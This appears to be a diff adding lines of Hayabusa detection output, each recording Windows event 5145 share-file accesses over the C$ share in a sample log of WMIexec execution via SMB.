+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
